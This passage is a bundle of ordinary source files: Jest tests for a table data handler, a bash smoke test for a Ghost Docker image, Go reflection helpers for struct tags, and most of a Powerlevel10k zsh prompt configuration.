		filtered = await handler.filterHandler( rows, 'j doe', columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 4 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'j', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'j', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'j', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'doe', columns );
		expect( filtered ).toHaveLength( 2 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );
	} );
	it( 'can filter data by multiple strings', async () => {
		const handler = new DefaultHandler<RowType>();
		const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );

		let filtered = await handler.filterHandler( rows, ['jo', 'do'], columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 5 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'jo', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
		expect( filtered ).toHaveLength( 2 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );

		rowMatchSpied.mockClear();

		filtered = await handler.filterHandler( rows, ['bogus'], columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 3 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'bogus', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'bogus', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'bogus', columns );
		expect( filtered ).toHaveLength( 0 );

		rowMatchSpied.mockClear();

		// When an array is given, each entry is a whole phrase (not re-split).
		filtered = await handler.filterHandler( rows, ['j doe', 'do'], columns );
		expect( rowMatchSpied ).toHaveBeenCalledTimes( 6 );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'j doe', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'j doe', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'j doe', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[0], 'do', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[1], 'do', columns );
		expect( rowMatchSpied ).toHaveBeenCalledWith( rows[2], 'do', columns );
		expect( filtered ).toHaveLength( 2 );
		expect( filtered[0].id ).toBe( 1 );
		expect( filtered[1].id ).toBe( 2 );
	} );
	it( 'Should not filter columns explicitly marked as non-filterable', async () => {
		const handler = new DefaultHandler<RowType>();
		const rowMatchSpied = jest.spyOn( handler, 'rowMatches' );

		// 'bar' appears only in the non-filterable 'foo'... actually in 'baz';
		// only the filterable column may produce the single match.
		const filtered = await handler.filterHandler(
			[{ foo: 'qux', baz: 'bar' }, { foo: 'qux', baz: 'bat' }],
			'bar',
			[new Column( { field: 'foo', filterable: false } ), new Column( { field: 'baz', filterable: true } )],
		);
		expect( filtered ).toHaveLength( 1 );
	} );
} );
describe( 'can sort data', () => {
	it( 'Sort with no column or order should be stable', async () => {
		const handler = new DefaultHandler<RowType>();

		const sorted = await handler.sortHandler( rows, undefined, null );
		expect( sorted ).toHaveLength( 3 );
		expect( sorted[0].id ).toBe( 1 );
		expect( sorted[1].id ).toBe( 2 );
		expect( sorted[2].id ).toBe( 3 );
	} );
	it( 'Sort ascending should sort correctly', async () => {
		const handler = new DefaultHandler<RowType>();

		// columns[3] is the numeric 'order' field.
		const sorted = await handler.sortHandler( rows, columns[3], 'asc' );
		expect( sorted ).toHaveLength( 3 );
		expect( sorted[0].id ).toBe( 2 );
		expect( sorted[1].id ).toBe( 1 );
		expect( sorted[2].id ).toBe( 3 );
	} );
	it( 'Sort descending should sort correctly', async () => {
		const handler = new DefaultHandler<RowType>();

		const sorted = await handler.sortHandler( rows, columns[3], 'desc' );
		expect( sorted ).toHaveLength( 3 );
		expect( sorted[0].id ).toBe( 3 );
		expect( sorted[1].id ).toBe( 1 );
		expect( sorted[2].id ).toBe( 2 );
	} );
	it( 'Sort on string should sort alphabetically', async () => {
		const handler = new DefaultHandler<RowType>();

		// columns[2] is the computed firstName+lastName string.
		const sorted = await handler.sortHandler( rows, columns[2], 'asc' );
		expect( sorted ).toHaveLength( 3 );
		expect( sorted[0].id ).toBe( 3 );
		expect( sorted[1].id ).toBe( 2 );
		expect( sorted[2].id ).toBe( 1 );
	} );
	it( 'Sort equal cols value should be stable', async () => {
		const handler = new DefaultHandler<RowType>();

		// columns[4] ('eq') is 42 for every row: original order must be kept.
		const sorted = await handler.sortHandler( rows, columns[4], 'desc' );
		expect( sorted ).toHaveLength( 3 );
		expect( sorted[0].id ).toBe( 1 );
		expect( sorted[1].id ).toBe( 2 );
		expect( sorted[2].id ).toBe( 3 );
	} );
} );
describe( 'can paginate data', () => {
	it( 'Normal pagination should return a correct number of items', async () => {
		const handler = new DefaultHandler<RowType>();
		// (rows, perPage, page) → expected ids on that page.
		const pageOne = await handler.paginateHandler( rows, 1, 1 );
		expect( pageOne.map( row => row.id ) ).toEqual( [ 1 ] );
		const pageTwo = await handler.paginateHandler( rows, 1, 2 );
		expect( pageTwo.map( row => row.id ) ).toEqual( [ 2 ] );
		const widePage = await handler.paginateHandler( rows, 2, 1 );
		expect( widePage.map( row => row.id ) ).toEqual( [ 1, 2 ] );
	} );
	it( 'Paginate with 0 or less items per page should skip pagination', async () => {
		const handler = new DefaultHandler<RowType>();
		// Skipping pagination means the source array is returned by reference.
		for ( const perPage of [ 0, -5 ] ) {
			expect( await handler.paginateHandler( rows, perPage, 1 ) ).toBe( rows );
		}
	} );
	it( 'Paginate for page 0 or less should skip pagination', async () => {
		const handler = new DefaultHandler<RowType>();
		for ( const page of [ 0, -5 ] ) {
			expect( await handler.paginateHandler( rows, 1, page ) ).toBe( rows );
		}
	} );
} );
it( 'Display handler extracts correct data', async () => {
	const handler = new DefaultHandler<{id: number}>();
	const result = await handler.displayHandler( {
		filtered: [{ id: 1 }, { id: 2 }],
		paged: [{ id: 1 }],
		sorted: [{ id: 1 }, { id: 2 }],
		source: [{ id: 1 }, { id: 2 }, { id: 3 }],
	} );
	// Rows come from the paged set; totalRowCount reflects the filtered set,
	// not the full source.
	expect( result ).toEqual( { rows: [{ id: 1 }], totalRowCount: 2 } );
} );
|
#!/bin/bash
set -eo pipefail

# Smoke-test a Ghost server image: start a container from "$1", then probe it
# over HTTP from a throwaway curl client container linked to it.
# ${BASH_SOURCE[0]} (not the bare array name) reliably names this script even
# when it is sourced rather than executed.
dir="$(dirname "$(readlink -f "${BASH_SOURCE[0]}")")"

serverImage="$1"

# Use a client image with curl for testing
clientImage='buildpack-deps:jessie-curl'

# Create an instance of the container-under-test
cid="$(docker run -d "$serverImage")"
# Always remove the container on exit, even if a test step fails. Single
# quotes defer expansion to trap time and keep "$cid" safely quoted.
trap 'docker rm -vf "$cid" > /dev/null' EXIT

# _request METHOD URL [extra curl args...] — run curl against the container
# from a linked client container; -f makes HTTP errors fail the pipeline.
_request() {
	local method="$1"
	shift
	local url="$1"
	shift
	docker run --rm --link "$cid":ghost "$clientImage" \
		curl -fs -X"$method" "$@" "http://ghost:2368/$url"
}

# Make sure that Ghost is listening and ready
. "$dir/../../retry.sh" '_request GET / --output /dev/null'

# Check that /ghost/ redirects to setup (the image is unconfigured by default)
ghostVersion="$(docker inspect --format '{{range .Config.Env}}{{ . }}{{"\n"}}{{end}}' "$serverImage" | awk -F= '$1 == "GHOST_VERSION" { print $2 }')"
case "$ghostVersion" in
	0.*) _request GET '/ghost/' -I | grep -q '^Location: .*setup' ;;
	*) _request GET '/ghost/api/v0.1/authentication/setup/' | grep -q 'status":false' ;;
esac
|
<reponame>shammishailaj/ghd<gh_stars>0
package utils
import (
"log"
"reflect"
)
// GetFieldTagMap returns a map from each field name of the struct d (or the
// struct d points to) to the value of that field's tag for tagIdentifier
// (e.g. "json"). It returns a nil map when d is nil, and an empty map when d
// is not a struct — instead of panicking in reflect.Type.NumField.
func GetFieldTagMap(d interface{}, tagIdentifier string) map[string]string {
	log.Printf("============================================================GetFieldTagMap()")
	log.Printf("d = %#v", d)
	var fieldTagMap map[string]string
	if d == nil {
		return fieldTagMap
	}
	v := reflect.TypeOf(d)
	if v.Kind() == reflect.Ptr {
		v = v.Elem()
	}
	fieldTagMap = make(map[string]string)
	log.Printf("Type of d = %s. Kind: %s", v.Name(), v.Kind())
	if v.Kind() != reflect.Struct {
		// NumField panics for non-struct kinds; report "no fields" instead.
		return fieldTagMap
	}
	for i := 0; i < v.NumField(); i++ {
		field := v.Field(i)
		fieldTagMap[field.Name] = field.Tag.Get(tagIdentifier)
		log.Printf("Found field Tag = %s for field named: %s", fieldTagMap[field.Name], field.Name)
	}
	return fieldTagMap
}
// GetTagValueMap returns a map from each field's tag value (for tagIdentifier)
// to that field's value rendered via reflect.Value.String. It returns a nil
// map when d is nil, and an empty map when d is not a struct — instead of
// panicking in reflect.Type.NumField.
//
// NOTE(review): Value.String only yields the real value for string fields;
// other kinds render as "<T Value>". Kept as-is to preserve behavior — confirm
// callers only use string fields.
func GetTagValueMap(d interface{}, tagIdentifier string) map[string]string {
	// Log banner previously said GetFieldTagMap() — copy-paste bug, fixed.
	log.Printf("============================================================GetTagValueMap()")
	log.Printf("d = %#v", d)
	var tagValueMap map[string]string
	if d == nil {
		return tagValueMap
	}
	v := reflect.TypeOf(d)
	val := reflect.Indirect(reflect.ValueOf(d))
	if v.Kind() == reflect.Ptr {
		v = v.Elem()
	}
	tagValueMap = make(map[string]string)
	log.Printf("Type of d = %s. Kind: %s", v.Name(), v.Kind())
	if v.Kind() != reflect.Struct {
		// NumField panics for non-struct kinds; report "no fields" instead.
		return tagValueMap
	}
	for i := 0; i < v.NumField(); i++ {
		field := v.Field(i)
		tagName := field.Tag.Get(tagIdentifier)
		tagValueMap[tagName] = val.FieldByName(field.Name).String()
		log.Printf("Found field Tag = %s, Value: %s", tagName, tagValueMap[tagName])
	}
	return tagValueMap
}
// GetFieldValue returns the value of the named exported field of the struct d
// (or the struct d points to). It returns nil when d is nil, when d is not a
// struct, or when the field is missing/unexported — instead of panicking.
func GetFieldValue(d interface{}, field string) interface{} {
	if d == nil {
		return nil
	}
	v := reflect.Indirect(reflect.ValueOf(d))
	if v.Kind() != reflect.Struct {
		// FieldByName panics for non-struct kinds (including a nil pointer
		// indirected to an invalid Value); report absence instead.
		return nil
	}
	log.Printf("Type of d = %s. Kind: %s", v.Type().Name(), v.Kind())
	f := v.FieldByName(field)
	if !f.IsValid() || !f.CanInterface() {
		return nil
	}
	// Unwrap the reflect.Value so callers receive the actual field value.
	// The original returned the reflect.Value wrapper itself, which would
	// type-assert to reflect.Value rather than to the field's type.
	return f.Interface()
}
# Generated by Powerlevel10k configuration wizard on 2020-12-06 at 19:56 +07.
# Based on romkatv/powerlevel10k/config/p10k-rainbow.zsh, checksum 24826.
# Wizard options: nerdfont-complete + powerline, small icons, rainbow, unicode,
# vertical separators, round heads, flat tails, 2 lines, dotted, no frame,
# darkest-ornaments, sparse, few icons, concise, transient_prompt,
# instant_prompt=verbose.
# Type `p10k configure` to generate another config.
#
# Config for Powerlevel10k with powerline prompt style with colorful background.
# Type `p10k configure` to generate your own config based on it.
#
# Tip: Looking for a nice color? Here's a one-liner to print colormap.
#
# for i in {0..255}; do print -Pn "%K{$i} %k%F{$i}${(l:3::0:)i}%f " ${${(M)$((i%6)):#3}:+$'\n'}; done
# Temporarily change options: record which of these options are currently set
# (so the tail of this config can restore them), then force the parser state
# this file expects — no aliases, no sh_glob, brace expansion on.
# The quoted 'builtin' words guard against these command names being aliased.
'builtin' 'local' '-a' 'p10k_config_opts'
[[ ! -o 'aliases' ]] || p10k_config_opts+=('aliases')
[[ ! -o 'sh_glob' ]] || p10k_config_opts+=('sh_glob')
[[ ! -o 'no_brace_expand' ]] || p10k_config_opts+=('no_brace_expand')
'builtin' 'setopt' 'no_aliases' 'no_sh_glob' 'brace_expand'
() {
emulate -L zsh -o extended_glob
# Unset all configuration options. This allows you to apply configuration changes without
# restarting zsh. Edit ~/.p10k.zsh and type `source ~/.p10k.zsh`.
unset -m '(POWERLEVEL9K_*|DEFAULT_USER)~POWERLEVEL9K_GITSTATUS_DIR'
# Zsh >= 5.1 is required.
autoload -Uz is-at-least && is-at-least 5.1 || return
# The list of segments shown on the left. Fill it with the most important segments.
typeset -g POWERLEVEL9K_LEFT_PROMPT_ELEMENTS=(
# =========================[ Line #1 ]=========================
# os_icon # os identifier
dir # current directory
vcs # git status
# =========================[ Line #2 ]=========================
newline # \n
prompt_char # prompt symbol
)
# The list of segments shown on the right. Fill it with less important segments.
# Right prompt on the last prompt line (where you are typing your commands) gets
# automatically hidden when the input line reaches it. Right prompt above the
# last prompt line gets hidden if it would overlap with left prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS=(
# =========================[ Line #1 ]=========================
status # exit code of the last command
command_execution_time # duration of the last command
background_jobs # presence of background jobs
direnv # direnv status (https://direnv.net/)
asdf # asdf version manager (https://github.com/asdf-vm/asdf)
virtualenv # python virtual environment (https://docs.python.org/3/library/venv.html)
anaconda # conda environment (https://conda.io/)
pyenv # python environment (https://github.com/pyenv/pyenv)
goenv # go environment (https://github.com/syndbg/goenv)
nodenv # node.js version from nodenv (https://github.com/nodenv/nodenv)
nvm # node.js version from nvm (https://github.com/nvm-sh/nvm)
nodeenv # node.js environment (https://github.com/ekalinin/nodeenv)
# node_version # node.js version
# go_version # go version (https://golang.org)
# rust_version # rustc version (https://www.rust-lang.org)
# dotnet_version # .NET version (https://dotnet.microsoft.com)
# php_version # php version (https://www.php.net/)
# laravel_version # laravel php framework version (https://laravel.com/)
# java_version # java version (https://www.java.com/)
# package # name@version from package.json (https://docs.npmjs.com/files/package.json)
rbenv # ruby version from rbenv (https://github.com/rbenv/rbenv)
rvm # ruby version from rvm (https://rvm.io)
fvm # flutter version management (https://github.com/leoafarias/fvm)
luaenv # lua version from luaenv (https://github.com/cehoffman/luaenv)
jenv # java version from jenv (https://github.com/jenv/jenv)
plenv # perl version from plenv (https://github.com/tokuhirom/plenv)
phpenv # php version from phpenv (https://github.com/phpenv/phpenv)
scalaenv # scala version from scalaenv (https://github.com/scalaenv/scalaenv)
haskell_stack # haskell version from stack (https://haskellstack.org/)
kubecontext # current kubernetes context (https://kubernetes.io/)
terraform # terraform workspace (https://www.terraform.io)
aws # aws profile (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html)
aws_eb_env # aws elastic beanstalk environment (https://aws.amazon.com/elasticbeanstalk/)
azure # azure account name (https://docs.microsoft.com/en-us/cli/azure)
gcloud # google cloud cli account and project (https://cloud.google.com/)
google_app_cred # google application credentials (https://cloud.google.com/docs/authentication/production)
context # user@hostname
nordvpn # nordvpn connection status, linux only (https://nordvpn.com/)
ranger # ranger shell (https://github.com/ranger/ranger)
nnn # nnn shell (https://github.com/jarun/nnn)
vim_shell # vim shell indicator (:sh)
midnight_commander # midnight commander shell (https://midnight-commander.org/)
nix_shell # nix shell (https://nixos.org/nixos/nix-pills/developing-with-nix-shell.html)
# vi_mode # vi mode (you don't need this if you've enabled prompt_char)
# vpn_ip # virtual private network indicator
# load # CPU load
# disk_usage # disk usage
# ram # free RAM
# swap # used swap
todo # todo items (https://github.com/todotxt/todo.txt-cli)
timewarrior # timewarrior tracking status (https://timewarrior.net/)
taskwarrior # taskwarrior task count (https://taskwarrior.org/)
# time # current time
# =========================[ Line #2 ]=========================
newline
# ip # ip address and bandwidth usage for a specified network interface
# public_ip # public IP address
# proxy # system-wide http/https/ftp proxy
# battery # internal battery
# wifi # wifi speed
# example # example user-defined segment (see prompt_example function below)
)
# Defines character set used by powerlevel10k. It's best to let `p10k configure` set it for you.
typeset -g POWERLEVEL9K_MODE=nerdfont-complete
# When set to `moderate`, some icons will have an extra space after them. This is meant to avoid
# icon overlap when using non-monospace fonts. When set to `none`, spaces are not added.
typeset -g POWERLEVEL9K_ICON_PADDING=none
# When set to true, icons appear before content on both sides of the prompt. When set
# to false, icons go after content. If empty or not set, icons go before content in the left
# prompt and after content in the right prompt.
#
# You can also override it for a specific segment:
#
# POWERLEVEL9K_STATUS_ICON_BEFORE_CONTENT=false
#
# Or for a specific segment in specific state:
#
# POWERLEVEL9K_DIR_NOT_WRITABLE_ICON_BEFORE_CONTENT=false
typeset -g POWERLEVEL9K_ICON_BEFORE_CONTENT=
# Add an empty line before each prompt.
typeset -g POWERLEVEL9K_PROMPT_ADD_NEWLINE=true
# Connect left prompt lines with these symbols. You'll probably want to use the same color
# as POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_FOREGROUND below.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_PREFIX=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_PREFIX=
typeset -g POWERLEVEL9K_MULTILINE_LAST_PROMPT_PREFIX=
# Connect right prompt lines with these symbols.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_SUFFIX=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_SUFFIX=
typeset -g POWERLEVEL9K_MULTILINE_LAST_PROMPT_SUFFIX=
# Filler between left and right prompt on the first prompt line. You can set it to ' ', '·' or
# '─'. The last two make it easier to see the alignment between left and right prompt and to
# separate prompt from command output. You might want to set POWERLEVEL9K_PROMPT_ADD_NEWLINE=false
# for more compact prompt if using this option.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_CHAR='·'
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_BACKGROUND=
typeset -g POWERLEVEL9K_MULTILINE_NEWLINE_PROMPT_GAP_BACKGROUND=
if [[ $POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_CHAR != ' ' ]]; then
# The color of the filler. You'll probably want to match the color of POWERLEVEL9K_MULTILINE
# ornaments defined above.
typeset -g POWERLEVEL9K_MULTILINE_FIRST_PROMPT_GAP_FOREGROUND=238
# Start filler from the edge of the screen if there are no left segments on the first line.
typeset -g POWERLEVEL9K_EMPTY_LINE_LEFT_PROMPT_FIRST_SEGMENT_END_SYMBOL='%{%}'
# End filler on the edge of the screen if there are no right segments on the first line.
typeset -g POWERLEVEL9K_EMPTY_LINE_RIGHT_PROMPT_FIRST_SEGMENT_START_SYMBOL='%{%}'
fi
# Separator between same-color segments on the left.
typeset -g POWERLEVEL9K_LEFT_SUBSEGMENT_SEPARATOR='\u2502'
# Separator between same-color segments on the right.
typeset -g POWERLEVEL9K_RIGHT_SUBSEGMENT_SEPARATOR='\u2502'
# Separator between different-color segments on the left.
typeset -g POWERLEVEL9K_LEFT_SEGMENT_SEPARATOR=''
# Separator between different-color segments on the right.
typeset -g POWERLEVEL9K_RIGHT_SEGMENT_SEPARATOR=''
# The right end of left prompt.
typeset -g POWERLEVEL9K_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL='\uE0B4'
# The left end of right prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_FIRST_SEGMENT_START_SYMBOL='\uE0B6'
# The left end of left prompt.
typeset -g POWERLEVEL9K_LEFT_PROMPT_FIRST_SEGMENT_START_SYMBOL=''
# The right end of right prompt.
typeset -g POWERLEVEL9K_RIGHT_PROMPT_LAST_SEGMENT_END_SYMBOL=''
# Left prompt terminator for lines without any segments.
typeset -g POWERLEVEL9K_EMPTY_LINE_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL=
#################################[ os_icon: os identifier ]##################################
# OS identifier color.
typeset -g POWERLEVEL9K_OS_ICON_FOREGROUND=232
typeset -g POWERLEVEL9K_OS_ICON_BACKGROUND=7
# Custom icon.
# typeset -g POWERLEVEL9K_OS_ICON_CONTENT_EXPANSION='⭐'
################################[ prompt_char: prompt symbol ]################################
# Transparent background.
typeset -g POWERLEVEL9K_PROMPT_CHAR_BACKGROUND=
# Green prompt symbol if the last command succeeded.
typeset -g POWERLEVEL9K_PROMPT_CHAR_OK_{VIINS,VICMD,VIVIS,VIOWR}_FOREGROUND=76
# Red prompt symbol if the last command failed.
typeset -g POWERLEVEL9K_PROMPT_CHAR_ERROR_{VIINS,VICMD,VIVIS,VIOWR}_FOREGROUND=196
# Default prompt symbol.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIINS_CONTENT_EXPANSION='❯'
# Prompt symbol in command vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VICMD_CONTENT_EXPANSION='❮'
# Prompt symbol in visual vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIVIS_CONTENT_EXPANSION='V'
# Prompt symbol in overwrite vi mode.
typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIOWR_CONTENT_EXPANSION='▶'
typeset -g POWERLEVEL9K_PROMPT_CHAR_OVERWRITE_STATE=true
# No line terminator if prompt_char is the last segment.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_PROMPT_LAST_SEGMENT_END_SYMBOL=
# No line introducer if prompt_char is the first segment.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_PROMPT_FIRST_SEGMENT_START_SYMBOL=
# No surrounding whitespace.
typeset -g POWERLEVEL9K_PROMPT_CHAR_LEFT_{LEFT,RIGHT}_WHITESPACE=
##################################[ dir: current directory ]##################################
# Current directory background color.
typeset -g POWERLEVEL9K_DIR_BACKGROUND=4
# Default current directory foreground color.
typeset -g POWERLEVEL9K_DIR_FOREGROUND=254
# If directory is too long, shorten some of its segments to the shortest possible unique
# prefix. The shortened directory can be tab-completed to the original.
typeset -g POWERLEVEL9K_SHORTEN_STRATEGY=truncate_to_unique
# Replace removed segment suffixes with this symbol.
typeset -g POWERLEVEL9K_SHORTEN_DELIMITER=
# Color of the shortened directory segments.
typeset -g POWERLEVEL9K_DIR_SHORTENED_FOREGROUND=250
# Color of the anchor directory segments. Anchor segments are never shortened. The first
# segment is always an anchor.
typeset -g POWERLEVEL9K_DIR_ANCHOR_FOREGROUND=255
# Display anchor directory segments in bold.
typeset -g POWERLEVEL9K_DIR_ANCHOR_BOLD=true
# Don't shorten directories that contain any of these files. They are anchors.
local anchor_files=(
.bzr
.citc
.git
.hg
.node-version
.python-version
.go-version
.ruby-version
.lua-version
.java-version
.perl-version
.php-version
.tool-version
.shorten_folder_marker
.svn
.terraform
CVS
Cargo.toml
composer.json
go.mod
package.json
stack.yaml
)
typeset -g POWERLEVEL9K_SHORTEN_FOLDER_MARKER="(${(j:|:)anchor_files})"
# If set to "first" ("last"), remove everything before the first (last) subdirectory that contains
# files matching $POWERLEVEL9K_SHORTEN_FOLDER_MARKER. For example, when the current directory is
# /foo/bar/git_repo/nested_git_repo/baz, prompt will display git_repo/nested_git_repo/baz (first)
# or nested_git_repo/baz (last). This assumes that git_repo and nested_git_repo contain markers
# and other directories don't.
#
# Optionally, "first" and "last" can be followed by ":<offset>" where <offset> is an integer.
# This moves the truncation point to the right (positive offset) or to the left (negative offset)
# relative to the marker. Plain "first" and "last" are equivalent to "first:0" and "last:0"
# respectively.
typeset -g POWERLEVEL9K_DIR_TRUNCATE_BEFORE_MARKER=false
# Don't shorten this many last directory segments. They are anchors.
typeset -g POWERLEVEL9K_SHORTEN_DIR_LENGTH=1
# Shorten directory if it's longer than this even if there is space for it. The value can
# be either absolute (e.g., '80') or a percentage of terminal width (e.g., '50%'). If empty,
# directory will be shortened only when prompt doesn't fit or when other parameters demand it
# (see POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS and POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT below).
# If set to `0`, directory will always be shortened to its minimum length.
typeset -g POWERLEVEL9K_DIR_MAX_LENGTH=80
# When `dir` segment is on the last prompt line, try to shorten it enough to leave at least this
# many columns for typing commands.
typeset -g POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS=40
# When `dir` segment is on the last prompt line, try to shorten it enough to leave at least
# COLUMNS * POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT * 0.01 columns for typing commands.
typeset -g POWERLEVEL9K_DIR_MIN_COMMAND_COLUMNS_PCT=50
# If set to true, embed a hyperlink into the directory. Useful for quickly
# opening a directory in the file manager simply by clicking the link.
# Can also be handy when the directory is shortened, as it allows you to see
# the full directory that was used in previous commands.
typeset -g POWERLEVEL9K_DIR_HYPERLINK=false
# Enable special styling for non-writable directories. See POWERLEVEL9K_LOCK_ICON and
# POWERLEVEL9K_DIR_CLASSES below.
typeset -g POWERLEVEL9K_DIR_SHOW_WRITABLE=v2
# The default icon shown next to non-writable directories when POWERLEVEL9K_DIR_SHOW_WRITABLE is
# set to v2.
# typeset -g POWERLEVEL9K_LOCK_ICON='⭐'
# POWERLEVEL9K_DIR_CLASSES allows you to specify custom icons and colors for different
# directories. It must be an array with 3 * N elements. Each triplet consists of:
#
# 1. A pattern against which the current directory ($PWD) is matched. Matching is done with
# extended_glob option enabled.
# 2. Directory class for the purpose of styling.
# 3. An empty string.
#
# Triplets are tried in order. The first triplet whose pattern matches $PWD wins.
#
# If POWERLEVEL9K_DIR_SHOW_WRITABLE is set to v2 and the current directory is not writable,
# its class gets suffix _NOT_WRITABLE.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_DIR_CLASSES=(
# '~/work(|/*)' WORK ''
# '~(|/*)' HOME ''
# '*' DEFAULT '')
#
# Whenever the current directory is ~/work or a subdirectory of ~/work, it gets styled with class
# WORK or WORK_NOT_WRITABLE.
#
# Simply assigning classes to directories doesn't have any visible effects. It merely gives you an
# option to define custom colors and icons for different directory classes.
#
# # Styling for WORK.
# typeset -g POWERLEVEL9K_DIR_WORK_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_DIR_WORK_BACKGROUND=4
# typeset -g POWERLEVEL9K_DIR_WORK_FOREGROUND=254
# typeset -g POWERLEVEL9K_DIR_WORK_SHORTENED_FOREGROUND=250
# typeset -g POWERLEVEL9K_DIR_WORK_ANCHOR_FOREGROUND=255
#
# # Styling for WORK_NOT_WRITABLE.
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_BACKGROUND=4
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_FOREGROUND=254
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_SHORTENED_FOREGROUND=250
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_ANCHOR_FOREGROUND=255
#
# If a styling parameter isn't explicitly defined for some class, it falls back to the classless
# parameter. For example, if POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_FOREGROUND is not set, it falls
# back to POWERLEVEL9K_DIR_FOREGROUND.
#
typeset -g POWERLEVEL9K_DIR_CLASSES=()
# Custom prefix.
# typeset -g POWERLEVEL9K_DIR_PREFIX='in '
#####################################[ vcs: git status ]######################################
# Version control system colors.
# typeset -g POWERLEVEL9K_VCS_CLEAN_BACKGROUND=2
# typeset -g POWERLEVEL9K_VCS_MODIFIED_BACKGROUND=3
# typeset -g POWERLEVEL9K_VCS_UNTRACKED_BACKGROUND=2
# typeset -g POWERLEVEL9K_VCS_CONFLICTED_BACKGROUND=3
# typeset -g POWERLEVEL9K_VCS_LOADING_BACKGROUND=8
# Branch icon. Set this parameter to '\uF126 ' for the popular Powerline branch icon.
typeset -g POWERLEVEL9K_VCS_BRANCH_ICON=
# Untracked files icon. It's really a question mark, your font isn't broken.
# Change the value of this parameter to show a different icon.
typeset -g POWERLEVEL9K_VCS_UNTRACKED_ICON='?'
# Formatter for Git status.
#
# Example output: master ⇣42⇡42 *42 merge ~42 +42 !42 ?42.
#
# You can edit the function to customize how Git status looks.
#
# VCS_STATUS_* parameters are set by gitstatus plugin. See reference:
# https://github.com/romkatv/gitstatus/blob/master/gitstatus.plugin.zsh.
function my_git_formatter() {
emulate -L zsh
if [[ -n $P9K_CONTENT ]]; then
# If P9K_CONTENT is not empty, use it. It's either "loading" or from vcs_info (not from
# gitstatus plugin). VCS_STATUS_* parameters are not available in this case.
typeset -g my_git_format=$P9K_CONTENT
return
fi
# Styling for different parts of Git status.
local meta='%7F' # white foreground
local clean='%0F' # black foreground
local modified='%0F' # black foreground
local untracked='%0F' # black foreground
local conflicted='%1F' # red foreground
local res
local where # branch or tag
if [[ -n $VCS_STATUS_LOCAL_BRANCH ]]; then
res+="${clean}${(g::)POWERLEVEL9K_VCS_BRANCH_ICON}"
where=${(V)VCS_STATUS_LOCAL_BRANCH}
elif [[ -n $VCS_STATUS_TAG ]]; then
res+="${meta}#"
where=${(V)VCS_STATUS_TAG}
fi
# If local branch name or tag is at most 32 characters long, show it in full.
# Otherwise show the first 12 … the last 12.
# Tip: To always show local branch name in full without truncation, delete the next line.
(( $#where > 32 )) && where[13,-13]="…"
res+="${clean}${where//\%/%%}" # escape %
# Display the current Git commit if there is no branch or tag.
# Tip: To always display the current Git commit, remove `[[ -z $where ]] &&` from the next line.
[[ -z $where ]] && res+="${meta}@${clean}${VCS_STATUS_COMMIT[1,8]}"
# Show tracking branch name if it differs from local branch.
if [[ -n ${VCS_STATUS_REMOTE_BRANCH:#$VCS_STATUS_LOCAL_BRANCH} ]]; then
res+="${meta}:${clean}${(V)VCS_STATUS_REMOTE_BRANCH//\%/%%}" # escape %
fi
# ⇣42 if behind the remote.
